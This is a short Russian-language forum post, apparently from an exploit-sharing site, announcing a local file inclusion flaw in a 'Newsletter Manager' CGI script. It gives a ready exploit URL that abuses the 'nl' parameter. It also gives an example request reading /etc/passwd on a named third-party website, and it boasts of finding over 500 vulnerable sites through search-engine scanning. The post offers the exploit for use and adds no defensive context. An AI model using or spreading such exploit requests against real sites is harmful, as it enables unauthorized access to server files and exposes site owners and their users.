Уязвимость в Newsletter Manager

Описание:
Возможно подключение локальных файлов, достаточно передать запрос параметру nl . Уязвимы все ветки!
Сплойт:
wwwsite.ru/cgi-bin/newsletter.php.cgi?СЕСИЯ&action=nl_show&nl=ПОДКЛЮЧАЕМЫЙ_ФАЙЛ
Пример:
http://www.freaky-style.com/cgi-bin/new … etc/passwd

© Prosto - Уязвимость найдена 30.04.2008 wwwExploit.in

зы: после парсигна гугла нашел более 500 стр. т.е более 500 баженных сайтов